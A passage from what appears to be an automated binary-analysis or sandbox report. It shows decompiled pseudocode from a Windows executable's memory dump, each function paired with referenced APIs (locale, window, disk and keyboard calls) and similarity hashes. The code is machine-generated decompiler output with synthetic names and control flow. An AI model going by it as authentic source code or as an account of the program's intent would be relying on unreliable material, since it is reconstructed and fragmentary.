    						_push(0x112);
    						_t21 =  *(_t40 + 0x30);
    						_push(_t21);
    						L0040668C();
    					}
    					if( *((short*)(_t40 + 0x11a)) != 0) {
    						return  *((intOrPtr*)(_t40 + 0x118))();
    					}
    				}
    				return _t21;
    			}

    APIs
    • IsIconic.USER32(?), ref: 0044AD18
    • SetActiveWindow.USER32(?,?,?,?,0044A7E0,00000000,0044ACAB), ref: 0044AD30
    • IsWindowEnabled.USER32(00000000), ref: 0044AD53
    • SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000040,00000000,?,?,?,?,0044A7E0,00000000,0044ACAB), ref: 0044AD7C
    • NtdllDefWindowProc_A.NTDLL(?,00000112,0000F020,00000000,?,00000000,?,?,?,00000000,00000040,00000000,?,?,?,?), ref: 0044AD91
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Window$ActiveEnabledIconicNtdllProc_
    • String ID:
    • API String ID: 1720852555-0
    • Opcode ID: 0eca10fc3f428fe2998653f0bb1c6eee74dd09e2e655326bc20792251aa65e67
    • Instruction ID: 279815cf48fb19b71404bbf2f0b8d17b494547346c88d226d4452da013fcf281
    • Opcode Fuzzy Hash: 0eca10fc3f428fe2998653f0bb1c6eee74dd09e2e655326bc20792251aa65e67
    • Instruction Fuzzy Hash: DC113DB1A402009BEB54EF69C9C6B9B37EDAF08705F08407ABA05DF687D679EC508719
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E004225DC(void* __edi, struct HWND__* _a4, signed int _a8) {
    				struct _WINDOWPLACEMENT _v48;
    				void* __ebx;
    				void* __esi;
    				void* __ebp;
    				signed int _t19;
    				intOrPtr _t21;
    				struct HWND__* _t23;
    
    				_t19 = _a8;
    				_t23 = _a4;
    				if( *0x47b939 != 0) {
    					if((_t19 & 0x00000003) == 0) {
    						if(IsIconic(_t23) == 0) {
    							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
    						} else {
    							GetWindowPlacement(_t23,  &_v48);
    						}
    						return E0042254C( &(_v48.rcNormalPosition), _t19);
    					}
    					return 0x12340042;
    				}
    				_t21 =  *0x47b914; // 0x4225dc
    				 *0x47b914 = E004223DC(1, _t19, _t21, __edi, _t23);
    				return  *0x47b914(_t23, _t19);
    			}

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: AddressProc
    • String ID: MonitorFromWindow
    • API String ID: 190572456-2842599566
    • Opcode ID: 27099281e275f9ea460658787de925e9ba509c89e33b1505458c0b9d1a056b88
    • Instruction ID: e37eb7e393eb9111e67360654c60f863db6b3fe4dba68253bb8b427315ac9a47
    • Opcode Fuzzy Hash: 27099281e275f9ea460658787de925e9ba509c89e33b1505458c0b9d1a056b88
    • Instruction Fuzzy Hash: 56018FB36014287A8710EB50AE81ABB735CDB04304F804027EA15A3351EB7C9A4196BE
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 58%
    			E00426D88(void* __eax, void* __ebx, void* __edi, void* __esi) {
    				char _v8;
    				CHAR* _t20;
    				long _t25;
    				intOrPtr _t30;
    				void* _t34;
    				intOrPtr _t37;
    
    				_push(0);
    				_t34 = __eax;
    				_push(_t37);
    				_push(0x426e05);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t37;
    				E004267E8(__eax);
    				_t25 = GetTickCount();
    				do {
    					Sleep(0);
    				} while (GetTickCount() - _t25 <= 0x3e8);
    				E004263E8(_t34, _t25,  &_v8, 0, __edi, _t34);
    				if(_v8 != 0) {
    					_t20 = E004046A0(_v8);
    					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
    				}
    				_pop(_t30);
    				 *[fs:eax] = _t30;
    				_push(0x426e0c);
    				return E004041E0( &_v8);
    			}

    APIs
      • Part of subcall function 004267E8: WinHelpA.USER32(00000000,00426800,00000002,00000000), ref: 004267F7
    • GetTickCount.KERNEL32 ref: 00426DA6
    • Sleep.KERNEL32(00000000,00000000,00426E05,?,?,00000000,00000000,?,00426D7E), ref: 00426DAF
    • GetTickCount.KERNEL32 ref: 00426DB4
    • WinHelpA.USER32(00000000,?,?,00000000), ref: 00426DEA
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: CountHelpTick$Sleep
    • String ID:
    • API String ID: 2438605093-0
    • Opcode ID: c97aa1d2d3793cb56c9e3c6d6bfd4bc97232377be7dc8d7aa85d2a5222bede55
    • Instruction ID: 6008f164493540e6f299179210a59a34b654a0230ab4380f61dad19cb1738b9d
    • Opcode Fuzzy Hash: c97aa1d2d3793cb56c9e3c6d6bfd4bc97232377be7dc8d7aa85d2a5222bede55
    • Instruction Fuzzy Hash: 0101A234700214AFE711EBA6EC42B5DB3A8DB48704F934477F901E65C1DA7DAE10C5AD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E00430020(void* __eax, intOrPtr* __edx) {
    				char _v20;
    				char _v28;
    				intOrPtr _t17;
    				void* _t19;
    				void* _t21;
    				void* _t32;
    				void* _t39;
    				void* _t45;
    				intOrPtr _t47;
    				intOrPtr _t48;
    				void* _t50;
    				void* _t51;
    				intOrPtr* _t65;
    				intOrPtr* _t67;
    				void* _t68;
    
    				_t67 = __edx;
    				_t50 = __eax;
    				_t17 =  *__edx;
    				_t68 = _t17 - 0x84;
    				if(_t68 > 0) {
    					_t19 = _t17 + 0xffffff00 - 9;
    					if(_t19 < 0) {
    						_t21 = E0042C680(__eax);
    						if(_t21 != 0) {
    							L28:
    							return _t21;
    						}
    						L27:
    						return E0042D190(_t50, _t67);
    					}
    					if(_t19 + 0xffffff09 - 0xb < 0) {
    						_t21 = E0042FF8C(__eax, _t51, __edx);
    						if(_t21 == 0) {
    							goto L27;
    						}
    						if( *((intOrPtr*)(_t67 + 0xc)) != 0) {
    							goto L28;
    						}
    						_t21 = E0043286C(_t50);
    						if(_t21 == 0) {
    							goto L28;
    						}
    						_push( *((intOrPtr*)(_t67 + 8)));
    						_push( *((intOrPtr*)(_t67 + 4)));
    						_push( *_t67);
    						_t32 = E0043260C(_t50);
    						_push(_t32);
    						L0040668C();
    						return _t32;
    					}
    					goto L27;
    				}
    				if(_t68 == 0) {
    					_t21 = E0042D190(__eax, __edx);
    					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
    						goto L28;
    					}
    					E00406B50( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
    					E0042BA9C(_t50,  &_v28,  &_v20);
    					_t21 = E0042FEF8(_t50, 0,  &_v28, 0);
    					if(_t21 == 0) {
    						goto L28;
    					}
    					 *((intOrPtr*)(_t67 + 0xc)) = 1;
    					return _t21;
    				}
    				_t39 = _t17 - 7;
    				if(_t39 == 0) {
    					_t65 = E00442640(__eax);
    					if(_t65 == 0) {
    						goto L27;
    					}
    					_t21 =  *((intOrPtr*)( *_t65 + 0xe8))();
    					if(_t21 == 0) {
    						goto L28;
    					}
    					goto L27;
    				}
    				_t21 = _t39 - 1;
    				if(_t21 == 0) {
    					if(( *(__eax + 0x54) & 0x00000020) != 0) {
    						goto L28;
    					}
    				} else {
    					if(_t21 == 0x17) {
    						_t45 = E0043260C(__eax);
    						if(_t45 == GetCapture() &&  *0x479a1c != 0) {
    							_t47 =  *0x479a1c; // 0x0
    							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
    								_t48 =  *0x479a1c; // 0x0
    								E0042D0C4(_t48, 0, 0x1f, 0);
    							}
    						}
    					}
    				}
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Capture
    • String ID:
    • API String ID: 1145282425-3916222277
    • Opcode ID: 28b772b7c94a9ffad3aed440cc9edf5125aed0e0bb486a145a6d403cccd4ba19
    • Instruction ID: 08e18ff472c6808cd64e93f6a064a4dcd5a101cec19396b2a439a1af65842da3
    • Opcode Fuzzy Hash: 28b772b7c94a9ffad3aed440cc9edf5125aed0e0bb486a145a6d403cccd4ba19
    • Instruction Fuzzy Hash: 44318B317042008ACF20AA3DDDA572B23A59B4D798F14AB3FB456C77A6DA7ECC05874D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00449B50() {
    				struct tagPOINT _v12;
    				void* _t5;
    				long _t6;
    
    				 *0x47bbac = GetCurrentThreadId();
    				L5:
    				_t5 =  *0x47bbb0; // 0x0
    				_t6 = WaitForSingleObject(_t5, 0x64);
    				if(_t6 == 0x102) {
    					if( *0x47bb9c != 0 &&  *((intOrPtr*)( *0x47bb9c + 0x60)) != 0) {
    						GetCursorPos( &_v12);
    						if(E0042A7D0( &_v12) == 0) {
    							E0044BF10( *0x47bb9c);
    						}
    					}
    					goto L5;
    				}
    				return _t6;
    			}

    APIs
    • GetCurrentThreadId.KERNEL32 ref: 00449B5C
    • GetCursorPos.USER32(?), ref: 00449B79
    • WaitForSingleObject.KERNEL32(00000000,00000064), ref: 00449B99
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: CurrentCursorObjectSingleThreadWait
    • String ID:
    • API String ID: 1359611202-0
    • Opcode ID: fbd48d564630ff88040c50a53cc3b70d2c881fad5de13e02d1dccfef96a1bc1c
    • Instruction ID: ac8770946664f0f2c4c483187e4a39fd1f1edb108847f5d51ab2bd235b597f84
    • Opcode Fuzzy Hash: fbd48d564630ff88040c50a53cc3b70d2c881fad5de13e02d1dccfef96a1bc1c
    • Instruction Fuzzy Hash: 31F05E315042589BEB10A769E886F9B33E8FB00314F40057BE945963D6E77DBC90EA5E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00431744(intOrPtr* __eax, intOrPtr __edx) {
    				intOrPtr _v8;
    				void* __ecx;
    				void* _t25;
    				intOrPtr* _t31;
    				void* _t34;
    				intOrPtr* _t37;
    				void* _t45;
    
    				_v8 = __edx;
    				_t37 = __eax;
    				if(( *(_v8 + 4) & 0x0000fff0) != 0xf100 ||  *((short*)(_v8 + 8)) == 0x20 ||  *((short*)(_v8 + 8)) == 0x2d || IsIconic( *(__eax + 0x180)) != 0 || GetCapture() != 0) {
    					L8:
    					if(( *(_v8 + 4) & 0x0000fff0) != 0xf100) {
    						L10:
    						return  *((intOrPtr*)( *_t37 - 0x10))();
    					}
    					_t25 = E00431694(_t37, _t45);
    					if(_t25 == 0) {
    						goto L10;
    					}
    				} else {
    					_t31 =  *0x479fc4; // 0x47bb9c
    					_t9 =  *_t31 + 0x44; // 0x0
    					if(_t37 ==  *_t9) {
    						goto L8;
    					} else {
    						_t34 = E00442640(_t37);
    						_t44 = _t34;
    						if(_t34 == 0) {
    							goto L8;
    						} else {
    							_t25 = E0042D0C4(_t44, 0, 0xb017, _v8);
    							if(_t25 == 0) {
    								goto L8;
    							}
    						}
    					}
    				}
    				return _t25;
    			}

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: CaptureIconic
    • String ID:
    • API String ID: 2277910766-0
    • Opcode ID: b2bd328e6ebfd9cb1cfac71af7c40fec09df9bfb1a48928ba1c26282719cb5a1
    • Instruction ID: 457b6533c217cfc343be275666b0f6fd441750a79479a3058dcbfa19efa5b80e
    • Opcode Fuzzy Hash: b2bd328e6ebfd9cb1cfac71af7c40fec09df9bfb1a48928ba1c26282719cb5a1
    • Instruction Fuzzy Hash: C31173367002059FDB24DB69C9C5D6AB3E4EF08308F2991BAF404DB362DB38ED409758
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 58%
    			E0041DA04(void* __ebx) {
    				char _v260;
    				char _v264;
    				long _t21;
    				void* _t22;
    				intOrPtr _t27;
    				void* _t32;
    
    				_v264 = 0;
    				_push(_t32);
    				_push(0x41daa0);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t32 + 0xfffffefc;
    				_t21 = GetLastError();
    				if(_t21 == 0 || FormatMessageA(0x1000, 0, _t21, 0x400,  &_v260, 0x100, 0) == 0) {
    					E0041D9B0(_t22);
    				} else {
    					E00404450( &_v264, 0x100,  &_v260);
    					E0040B61C(_v264, 1);
    					E00403BF4();
    				}
    				_pop(_t27);
    				 *[fs:eax] = _t27;
    				_push(0x41daa7);
    				return E004041E0( &_v264);
    			}

    APIs
    • GetLastError.KERNEL32(00000000,0041DAA0), ref: 0041DA24
    • FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,0041DAA0), ref: 0041DA4A
    Similarity
    • API ID: ErrorFormatLastMessage
    • String ID:
    • API String ID: 3479602957-0
    • Opcode ID: 66041053bbf2fec2a14a93a6bca3f66650a98c78e2c577603e60cb175c4fc77c
    • Instruction ID: cfef060e376b0b539c22b8213791ab266f963d2b0d5b9ca5f5d70c8cedac1601
    • Opcode Fuzzy Hash: 66041053bbf2fec2a14a93a6bca3f66650a98c78e2c577603e60cb175c4fc77c
    • Instruction Fuzzy Hash: 5101D8B06442045BD711EB618C82BD677A8DF48744F5100BAF604A66C1DAF86E80491C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 46%
    			E0040C424(int __eax, void* __ebx, void* __eflags) {
    				char _v11;
    				char _v16;
    				intOrPtr _t28;
    				void* _t31;
    				void* _t33;
    
    				_t33 = __eflags;
    				_v16 = 0;
    				_push(_t31);
    				_push(0x40c488);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t31 + 0xfffffff4;
    				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
    				E00404450( &_v16, 7,  &_v11);
    				_push(_v16);
    				E00408140(7, GetACP(), _t33);
    				_pop(_t28);
    				 *[fs:eax] = _t28;
    				_push(E0040C48F);
    				return E004041E0( &_v16);
    			}

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040C488), ref: 0040C44A
    • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040C488), ref: 0040C463
    Similarity
    • API ID: InfoLocale
    • String ID:
    • API String ID: 2299586839-0
    • Opcode ID: 99b10af4630ade1655d30ce88598a124e794e9924484ede18413a626b89adaf2
    • Instruction ID: 7080b606e37789b5d795a18867263ace17f01e512d406138876df6bafd48d411
    • Opcode Fuzzy Hash: 99b10af4630ade1655d30ce88598a124e794e9924484ede18413a626b89adaf2
    • Instruction Fuzzy Hash: 97F09675E04204ABEB00EFF2DC5299EB3AAEBC8718F50C57AB610A65C1EA7C66048654
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0042D190(intOrPtr* __eax, signed int* __edx) {
    				signed int _v12;
    				short _v14;
    				char _v16;
    				signed int _v20;
    				intOrPtr* _v24;
    				char _v280;
    				signed int _t39;
    				signed int _t40;
    				signed int _t46;
    				intOrPtr* _t47;
    				signed int _t50;
    				signed int _t53;
    				intOrPtr _t55;
    				intOrPtr _t56;
    				signed int _t67;
    				signed int _t68;
    				void* _t73;
    				signed int* _t79;
    				intOrPtr _t90;
    				intOrPtr* _t96;
    
    				_t79 = __edx;
    				_t96 = __eax;
    				if(( *(__eax + 0x1c) & 0x00000010) == 0) {
    					L4:
    					_t39 =  *_t79;
    					if(_t39 < 0x100 || _t39 > 0x108) {
    						_t40 =  *_t79;
    						__eflags = _t40 - 0x200;
    						if(_t40 < 0x200) {
    							L30:
    							__eflags = _t40 - 0xb00b;
    							if(_t40 == 0xb00b) {
    								E0042BAF8(_t96, _t79[1], _t40, _t79[2]);
    							}
    							L32:
    							return  *((intOrPtr*)( *_t96 - 0x14))();
    						}
    						__eflags = _t40 - 0x20a;
    						if(_t40 > 0x20a) {
    							goto L30;
    						}
    						__eflags =  *(_t96 + 0x50) & 0x00000080;
    						if(( *(_t96 + 0x50) & 0x00000080) != 0) {
    							L16:
    							_t46 =  *_t79 - 0x200;
    							__eflags = _t46;
    							if(__eflags == 0) {
    								L21:
    								_t47 =  *0x479fc4; // 0x47bb9c
    								E0044BD84( *_t47, _t79, _t96, __eflags);
    								goto L32;
    							}
    							_t50 = _t46 - 1;
    							__eflags = _t50;
    							if(_t50 == 0) {
    								L22:
    								__eflags =  *((char*)(_t96 + 0x5d)) - 1;
    								if(__eflags != 0) {
    									 *(_t96 + 0x54) =  *(_t96 + 0x54) | 0x00000001;
    									goto L32;
    								}
    								return E00403674(_t96, __eflags);
    							}
    							_t53 = _t50 - 1;
    							__eflags = _t53;
    							if(_t53 == 0) {
    								 *(_t96 + 0x54) =  *(_t96 + 0x54) & 0x0000fffe;
    								goto L32;
    							}
    							__eflags = _t53 == 1;
    							if(_t53 == 1) {
    								goto L22;
    							}
    							_t55 =  *0x47bafc; // 0x23212e4
    							__eflags =  *((char*)(_t55 + 0x20));
    							if( *((char*)(_t55 + 0x20)) == 0) {
    								goto L32;
    							} else {
    								_t56 =  *0x47bafc; // 0x23212e4
    								__eflags =  *(_t56 + 0x1c);
    								if( *(_t56 + 0x1c) == 0) {
    									goto L32;
    								}
    								_t90 =  *0x47bafc; // 0x23212e4
    								_t25 = _t90 + 0x1c; // 0x0
    								__eflags =  *_t79 -  *_t25;
    								if( *_t79 !=  *_t25) {
    									goto L32;
    								}
    								GetKeyboardState( &_v280);
    								_v20 =  *_t79;
    								_v16 = E00442584( &_v280);
    								_v14 = _t79[1];
    								_v12 = _t79[2];
    								return E00403674(_t96, __eflags);
    							}
    							goto L21;
    						}
    						_t67 = _t40 - 0x203;
    						__eflags = _t67;
    						if(_t67 == 0) {
    							L15:
    							 *_t79 =  *_t79 - 2;
    							__eflags =  *_t79;
    							goto L16;
    						}
    						_t68 = _t67 - 3;
    						__eflags = _t68;
    						if(_t68 == 0) {
    							goto L15;
    						}
    						__eflags = _t68 != 3;
    						if(_t68 != 3) {
    							goto L16;
    						}
    						goto L15;
    					}
    					_v24 = E00442640(_t96);
    					if(_v24 == 0) {
    						goto L32;
    					}
    					_t73 =  *((intOrPtr*)( *_v24 + 0xf0))();
    					if(_t73 == 0) {
    						goto L32;
    					}
    				} else {
    					_v24 = E00442640(__eax);
    					if(_v24 == 0 ||  *((intOrPtr*)(_v24 + 0x250)) == 0) {
    						goto L4;
    					} else {
    						_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x250)))) + 0x24))();
    						if(_t73 == 0) {
    							goto L4;
    						}
    					}
    				}
    				return _t73;
    			}

    APIs
    • GetKeyboardState.USER32(?), ref: 0042D2C5
    Similarity
    • API ID: KeyboardState
    • String ID:
    • API String ID: 1724228437-0
    • Opcode ID: e574633e99aa44e0701874bae464a37635a291eafc19d154c9a4a219d7b653de
    • Instruction ID: 2cdf1bf811ec38d7ff0aa50b9897839957e999b7af78596d65e4e16ec0134887
    • Opcode Fuzzy Hash: e574633e99aa44e0701874bae464a37635a291eafc19d154c9a4a219d7b653de
    • Instruction Fuzzy Hash: 1A41B034B00625CBDB24DF19E5887AAB7A0BB0A304F9484A6D845D7391C778DD41CBAE
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004085C0(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
    				long _v8;
    				long _v12;
    				long _v16;
    				long _v20;
    				intOrPtr _v24;
    				signed int _v28;
    				CHAR* _v32;
    				CHAR* _t28;
    				int _t35;
    				intOrPtr _t40;
    				intOrPtr _t43;
    				intOrPtr* _t46;
    				intOrPtr* _t47;
    				intOrPtr _t51;
    				intOrPtr _t53;
    
    				_t28 = _a4;
    				if(_t28 == 0) {
    					_v32 = 0;
    				} else {
    					_v32 = _t28;
    				}
    				_t35 = GetDiskFreeSpaceA(_v32,  &_v8,  &_v12,  &_v16,  &_v20);
    				_v28 = _v8 * _v12;
    				_v24 = 0;
    				_t51 = _v24;
    				_t40 = E00404FA8(_v28, _t51, _v16, 0);
    				_t46 = _a8;
    				 *_t46 = _t40;
    				 *((intOrPtr*)(_t46 + 4)) = _t51;
    				_t53 = _v24;
    				_t43 = E00404FA8(_v28, _t53, _v20, 0);
    				_t47 = _a12;
    				 *_t47 = _t43;
    				 *((intOrPtr*)(_t47 + 4)) = _t53;
    				return _t35;
    			}

    APIs
    • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 004085EC
    Similarity
    • API ID: DiskFreeSpace
    • String ID:
    • API String ID: 1705453755-0
    • Opcode ID: dc20761dc868d6fab9248eacf8ac21003288b8fbdfae51187ef1d0f57f68d21e
    • Instruction ID: dbe6ec5d6b810ea91c69dd887cac605aceebc644579eaafd21af76e645984789
    • Opcode Fuzzy Hash: dc20761dc868d6fab9248eacf8ac21003288b8fbdfae51187ef1d0f57f68d21e
    • Instruction Fuzzy Hash: 0311AFB1E00109AFDB44DF99C9819EFF7F9EF8C304B54817AA519E7250EA359A018BA4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 53%
    			E00424C58(intOrPtr __eax, intOrPtr* __edx) {
    				intOrPtr _v8;
    				intOrPtr _t12;
    				intOrPtr _t21;
    				intOrPtr _t22;
    				intOrPtr _t25;
    
    				_v8 = __eax;
    				_t22 =  *__edx;
    				_t26 = _t22 - 0x113;
    				if(_t22 != 0x113) {
    					_push( *((intOrPtr*)(__edx + 8)));
    					_push( *((intOrPtr*)(__edx + 4)));
    					_push(_t22);
    					_t12 =  *((intOrPtr*)(_v8 + 0x34));
    					_push(_t12);
    					L0040668C();
    					 *((intOrPtr*)(__edx + 0xc)) = _t12;
    					return _t12;
    				}
    				_push(0x424c92);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t25;
    				E00403674(_v8, _t26);
    				_pop(_t21);
    				 *[fs:eax] = _t21;
    				return 0;
    			}

    APIs
    • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00424CBD
    Similarity
    • API ID: NtdllProc_Window
    • String ID:
    • API String ID: 4255912815-0
    • Opcode ID: 84d45a41c838f2fa888901153c13ec9cef30d28358159fdd4b4fa576ca6812bd
    • Instruction ID: 317cdff58a45fd7c29f878d03715a96f2cfd89be59db7778aaa6d4ac5735af7b
    • Opcode Fuzzy Hash: 84d45a41c838f2fa888901153c13ec9cef30d28358159fdd4b4fa576ca6812bd
    • Instruction Fuzzy Hash: B1F0C276605214AF9B00CF9EE881C56B7ECEB4972039284B6F908D7340D635AD008A74
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 51%
    			E00405E24(int __eax, void* __ebx, void* __eflags) {
    				char _v8;
    				char _v15;
    				char _v20;
    				intOrPtr _t29;
    				void* _t32;
    
    				_v20 = 0;
    				_push(_t32);
    				_push(0x405e8a);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t32 + 0xfffffff0;
    				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
    				E00404450( &_v20, 7,  &_v15);
    				E00402EA4(_v20,  &_v8);
    				if(_v8 != 0) {
    				}
    				_pop(_t29);
    				 *[fs:eax] = _t29;
    				_push(E00405E91);
    				return E004041E0( &_v20);
    			}

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00405E8A), ref: 00405E4A
    Similarity
    • API ID: InfoLocale
    • String ID:
    • API String ID: 2299586839-0
    • Opcode ID: 7a0848b3c2da6ed0b53c1eef4dcff661b8127fc4aa43b29f5ade3943612a5f30
    • Instruction ID: 1f1f89246b2eed5bcf448db52d995c3961ec8abd47e4ee13cc9423f4ec1ef507
    • Opcode Fuzzy Hash: 7a0848b3c2da6ed0b53c1eef4dcff661b8127fc4aa43b29f5ade3943612a5f30
    • Instruction Fuzzy Hash: 30F0C830904609AFEB14EF91CC41AEFB376FBC4714F00857AE120765D0E7B82B44CA84
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E0041DFA0(intOrPtr __eax, intOrPtr __edx) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v48;
    				struct _SYSTEM_INFO* _t17;
    				unsigned int _t20;
    				unsigned int _t22;
    				signed int _t31;
    				intOrPtr _t33;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_t17 =  &_v48;
    				GetSystemInfo(_t17);
    				_t33 = _v8;
    				_t31 = _v12 - 1;
    				if(_t31 >= 0) {
    					if( *((short*)( &_v48 + 0x20)) == 3) {
    						do {
    							_t20 =  *(_t33 + _t31 * 4) >> 0x10;
    							 *(_t33 + _t31 * 4) = _t20;
    							_t31 = _t31 - 1;
    						} while (_t31 >= 0);
    						return _t20;
    					} else {
    						goto L2;
    					}
    					do {
    						L2:
    						asm("bswap eax");
    						_t22 =  *(_t33 + _t31 * 4) >> 8;
    						 *(_t33 + _t31 * 4) = _t22;
    						_t31 = _t31 - 1;
    					} while (_t31 >= 0);
    					return _t22;
    				}
    				return _t17;
    			}

    APIs
    • GetSystemInfo.KERNEL32(?), ref: 0041DFB0
    Similarity
    • API ID: InfoSystem
    • String ID:
    • API String ID: 31276548-0
    • Opcode ID: 5399972255b92a3fca5b2866e267ce3bd624c49bccd81e0362f108dba5755595
    • Instruction ID: 16753a57fa43138d6eb89ff9f16b64fadaf90e2e55725c96f9a61c426af0338f
    • Opcode Fuzzy Hash: 5399972255b92a3fca5b2866e267ce3bd624c49bccd81e0362f108dba5755595
    • Instruction Fuzzy Hash: 20F0F6B2D001099FCB04DF98C484CDCF7B4FB56301B40429AD405E7382EB38A6D2CB85
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040AE50(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
    				char _v260;
    				intOrPtr _t10;
    				void* _t18;
    
    				_t18 = __ecx;
    				_t10 = _a4;
    				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
    					return E00404234(_t10, _t18);
    				}
    				return E004042D0(_t10, _t5 - 1,  &_v260);
    			}

    APIs
    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040AE6E
    Similarity
    • API ID: InfoLocale
    • String ID:
    • API String ID: 2299586839-0
    • Opcode ID: dc6b5896c60b5f6fdc82ebe8b48d2fb40eb89506892b10ecb155b7528148c1be
    • Instruction ID: 6eacdcebaf929e3570d169f18aa0b1c6badafa638c334ab221c875e1a54e7cfc
    • Opcode Fuzzy Hash: dc6b5896c60b5f6fdc82ebe8b48d2fb40eb89506892b10ecb155b7528148c1be
    • Instruction Fuzzy Hash: C6E0927170031416D711A5599C82AF6735CA758350F0042BFBE09E73C2EDB49D5486EA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E0040AE9C(int __eax, char __ecx, int __edx) {
    				char _v16;
    				char _t5;
    				char _t6;
    
    				_push(__ecx);
    				_t6 = __ecx;
    				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
    					_t5 = _t6;
    				} else {
    					_t5 = _v16;
    				}
    				return _t5;
    			}

    APIs
    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040C73A,00000000,0040C953,?,?,00000000,00000000), ref: 0040AEAF
    Similarity
    • API ID: InfoLocale
    • String ID:
